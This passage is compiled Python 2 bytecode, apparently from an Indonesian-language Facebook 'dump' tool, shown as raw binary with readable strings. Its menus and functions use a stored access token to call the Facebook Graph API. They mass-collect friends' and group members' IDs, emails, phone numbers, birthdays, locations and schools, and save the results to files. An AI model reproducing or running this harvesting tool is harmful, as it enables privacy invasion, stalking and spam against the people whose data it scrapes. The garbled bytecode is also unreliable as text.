00\x83\x01\x00}\x06\x00d\x0f\x00d\x10\x00\x14GHy\x11\x00d\x11\x00|\x06\x00d\x0b\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00rA\x01\x01\x01\x01d\x12\x00GHn\x01\x00Xy\x11\x00d\x13\x00|\x06\x00d\x0c\x00\x19\x17GHWn\x16\x00\x04t\x1
0\x00k\n\x00rk\x01\x01\x01\x01d\x14\x00GHn\x01\x00Xy\x11\x00d\x15\x00|\x06\x00d\x16\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00r\x95\x01\x01\x01\x01d\x17\x00GHn\x01\x00Xy\x11\x00d\x18\x00|\x06\x00d\x19\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00r\xbf\x01\x01\x01\x01d\x1a\x00GHn\x01\x00Xy\x15\x00d\x1b\x00|\x06\x00d\x1c\x00\x19d\x0b\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00r\xed\x01\x01\x01\x01d\x1d\x00GHn\x01\x00Xy\x11\x00d\x1e\x00|\x06\x00d\x1f\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00r\x17\x02\x01\x01\x01d \x00GHn\x01\x00XyL\x00d!\x00GHx@\x00|\x06\x00d"\x00\x19D]4\x00}\x07\x00y\x15\x00d#\x00|\x07\x00d$\x00\x19d\x0b\x00\x19\x17GHWq+\x02\x04t\x10\x00k\n\x00r^\x02\x01\x01\x01d%\x00GHq+\x02Xq+\x02WWn\x11\x00\x04t\x10\x00k\n\x00rw\x02\x01\x01\x01n\x01\x00Xt\t\x00d&\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01q\xb8\x00q\xb8\x00Wd\'\x00GHt\t\x00d&\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01d\x00\x00S((\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s>\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mEnter ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97ms,\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=Rl\x00\x00\x00R0\x00\x00\x00Rj\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : s9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : s9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : R?\x00\x00\x00s9\x00\x00\x00\x1b[1;91m[?] 
\x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTelephone\x1b[1;97m : t\x0c\x00\x00\x00mobile_phones9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mTelephone\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : t\x08\x00\x00\x00locations9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mDate of birth\x1b[1;97m : t\x08\x00\x00\x00birthdays9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mDate of birth\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : t\t\x00\x00\x00educations#\x00\x00\x00\x1b[1;91m ~ \x1b[1;97mt\x06\x00\x00\x00schools,\x00\x00\x00\x1b[1;91m ~ \x1b[1;91mNot founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1b\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] User not found(\x12\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R+\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00aidR\'\x00\x00\x00t\x03\x00\x00\x00cokR\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00t\x01\x00\x00\x00q(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>Ru\x00\x00\x00/\x01\x00\x00st\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\n\x01\x13\x01\x12\x01\x11\x01 
\x01\x1f\x01\x12\x01\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x15\x01\r\x00\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x05\x01\x11\x01\x03\x01\x15\x01\r\x00\x11\x01\r\x00\x04\x01\n\x01\n\x02\x04\x02\x05\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xb9\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHd\x0f\x00GHd\x10\x00GHd\x11\x00GHd\x12\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x13\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Get ID friends?\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Get ID friend from friends3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Get ID Searchs9\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m Get group member IDs<\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Get group member emailsC\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m6.\x1b[1;97m Get group member phone numbers6\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m7.\x1b[1;97m Get email friendsB\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m8.\x1b[1;97m Get email friend from friendsA\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m9.\x1b[1;97m Get a friend\'s phone numbersN\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m10.\x1b[1;97m Get a friend\'s phone 
number from friends*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\n\x00\x00\x00dump_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00dumpf\x01\x00\x00s.\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s;\x01\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x10\x01|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\xfa\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01n\xe4\x00|\x00\x00d\x06\x00k\x02\x00r{\x00t\x04\x00j\x05\x00d\x07\x00\x83\x01\x00\x01d\x08\x00GHt\x06\x00\x83\x00\x00\x01n\xbc\x00|\x00\x00d\t\x00k\x02\x00r\x91\x00t\x07\x00\x83\x00\x00\x01n\xa6\x00|\x00\x00d\n\x00k\x02\x00r\xa7\x00t\x08\x00\x83\x00\x00\x01n\x90\x00|\x00\x00d\x0b\x00k\x02\x00r\xbd\x00t\t\x00\x83\x00\x00\x01nz\x00|\x00\x00d\x0c\x00k\x02\x00r\xd3\x00t\n\x00\x83\x00\x00\x01nd\x00|\x00\x00d\r\x00k\x02\x00r\xe9\x00t\x0b\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x0e\x00k\x02\x00r\xff\x00t\x0c\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x0f\x00k\x02\x00r\x15\x01t\r\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x10\x00k\x02\x00r+\x01t\x0e\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x11\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] 
Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00R&\x00\x00\x00s\r\x00\x00\x00\x1b[1;91mSegeraRt\x00\x00\x00t\x01\x00\x00\x005t\x01\x00\x00\x006t\x01\x00\x00\x007t\x01\x00\x00\x008t\x01\x00\x00\x009t\x02\x00\x00\x0010R:\x00\x00\x00(\x0f\x00\x00\x00R/\x00\x00\x00R\x7f\x00\x00\x00t\x08\x00\x00\x00id_temant\x0c\x00\x00\x00idfrom_temanR\x05\x00\x00\x00R(\x00\x00\x00R\x08\x00\x00\x00t\x0e\x00\x00\x00id_member_grupt\x0e\x00\x00\x00em_member_grupt\x0e\x00\x00\x00no_member_grupR?\x00\x00\x00t\x0f\x00\x00\x00emailfrom_temant\x08\x00\x00\x00nomor_hpt\x0c\x00\x00\x00hpfrom_temanR+\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00cuih(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x7f\x00\x00\x00\x7f\x01\x00\x00s<\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\r\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sQ\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy*\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00j\x0c\x00d\x08\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\r\x00j\x0e\x00|\x01\x00j\x0f\x00\x83\x01\x00}\x02\x00t\x10\x00d\t\x00\x83\x01\x00\x01d\n\x00d\x0b\x00\x14GHt\x02\x00d\x0c\x00d\r\x00\x83\x02\x00}\x03\x00xr\x00|\x02\x00d\x0e\x00\x19D]f\x00}\x04\x00t\x11\x00j\x12\x00|\x04\x00d\x0f\x00\x19\x83\x01\x00\x01|\x03\x00j\x13\x00|\x04\x00d\x0f\x00\x19d\x10\x00\x17\x83\x01\x00\x01d\x11\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17d\x12\x00\x17|\x04\x00d\x0f\x00\x19\x17Gt\x16\x00j\x17\x00j\x18
\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x13\x00\x83\x01\x00\x01q\xec\x00W|\x03\x00j\x19\x00\x83\x00\x00\x01d\x14\x00GHd\x15\x00t\x15\x00t\x11\x00\x83\x01\x00\x16GHt\x1a\x00d\x16\x00\x83\x01\x00}\x05\x00t\x00\x00j\x1b\x00d\x0c\x00d\x17\x00|\x05\x00\x17\x83\x02\x00\x01d\x18\x00|\x05\x00\x17GHt\x1a\x00d\x19\x00\x83\x01\x00\x01t\x1c\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r\xd8\x01\x01\x01\x01d\x1a\x00GHt\x1a\x00d\x19\x00\x83\x01\x00\x01t\x1c\x00\x83\x00\x00\x01nu\x00\x04t\x1d\x00t\x1e\x00f\x02\x00k\n\x00r\x04\x02\x01\x01\x01d\x1b\x00GHt\x1a\x00d\x19\x00\x83\x01\x00\x01t\x1c\x00\x83\x00\x00\x01nI\x00\x04t\x1f\x00k\n\x00r*\x02\x01\x01\x01d\x1c\x00GHt\x1a\x00d\x19\x00\x83\x01\x00\x01t\x1c\x00\x83\x00\x00\x01n#\x00\x04t\x0b\x00j \x00j!\x00k\n\x00rL\x02\x01\x01\x01d\x1d\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00t\x03\x00\x00\x00outs3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s0\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend id \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x10\x00\x00\x00out/id_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97mg-C\x1c\xeb\xe26\x1a?sB\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get id \x1b[1;97m....s.\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] 
Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00t\x05\x00\x00\x00mkdirt\x07\x00\x00\x00OSErrorR.\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00t\x07\x00\x00\x00idtemant\x06\x00\x00\x00appendR\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00t\x06\x00\x00\x00renameR\x80\x00\x00\x00t\x11\x00\x00\x00KeyboardInterruptt\x08\x00\x00\x00EOFErrorR,\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x06\x00\x00\x00R4\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00t\x02\x00\x00\x00bzRm\x00\x00\x00t\x04\x00\x00\x00done(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x87\x00\x00\x00\xa1\x01\x00\x00sb\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x13\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x11\x01\x15\x01 
\x00\r\x00\x11\x01\n\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\t\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xd1\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\xaa\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\r\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\x0f\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\x0e\x00j\x0f\x00|\x04\x00j\x10\x00\x83\x01\x00}\x05\x00t\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHt\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x06\x00xv\x00|\x05\x00d\x15\x00\x19d\x16\x00\x19D]f\x00}\x07\x00t\x14\x00j\x15\x00|\x07\x00d\x17\x00\x19\x83\x01\x00\x01|\x06\x00j\x16\x00|\x07\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\x07\x00d\x17\x00\x19\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1b\x00\x83\x01\x00\x01ql\x01W|\x06\x00j\x1c\x00\x83\x00\x00\x01d\x1c\x00GHd\x1d\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1e\x00\x83\x01\x00}\x08\x00t\x00\x00j\x1d\x00d\x13\x00d\x1f\x00|\x08\x00\x17\x83\x02\x00\x01d 
\x00|\x08\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00rX\x02\x01\x01\x01d!\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\x84\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\xaa\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\xcc\x02\x01\x01\x01d$\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(%\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s*\x00\x00\x00?fields=friends.limit(90000)&access_token=s<\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend id from friend \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00out/id_teman_from_teman.txtR\x11\x00\x00\x00t\x07\x00\x00\x00friendsRl\x00\x00\x00Rj\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97mg-C\x1c\xeb\xe26\x1a?sB\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get id \x1b[1;97m....s.\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] 
Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x0b\x00\x00\x00idfromtemanR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\t\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00idtt\x03\x00\x00\x00jokt\x02\x00\x00\x00opR\'\x00\x00\x00R\x1e\x00\x00\x00R\x98\x00\x00\x00Rm\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x88\x00\x00\x00\xd3\x01\x00\x00st\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\n\x01\t\x01\x0f\x01\x15\x01\x11\x01\x15\x01 
\x00\r\x00\x11\x01\n\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\t\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xc0\x02\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x05\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x03\x00j\x08\x00d\x06\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00rw\x00\x01\x01\x01n\x01\x00Xy\xa6\x01t\x03\x00j\x04\x00d\x07\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\x00\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x13\x00d\x0f\x00\x83\x01\x00\x01d\x10\x00d\x11\x00\x14GHt\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00t\x0c\x00j\r\x00d\x14\x00|\x01\x00\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0e\x00j\x0f\x00|\x05\x00j\x10\x00\x83\x01\x00}\x06\x00xr\x00|\x06\x00d\x16\x00\x19D]f\x00}\x07\x00t\x14\x00j\x15\x00|\x07\x00d\x17\x00\x19\x83\x01\x00\x01|\x04\x00j\x16\x00|\x07\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\x07\x00d\x17\x00\x19\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1b\x00\x83\x01\x00\x01q[\x01W|\x04\x00j\x1c\x00\x83\x00\x00\x01d\x1c\x00GHd\x1d\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1e\x00\x83\x01\x00}\x08\x00t\x03\x00j\x1d\x00d\x12\x00d\x1f\x00|\x08\x00\x17\x83\x02\x00\x01d 
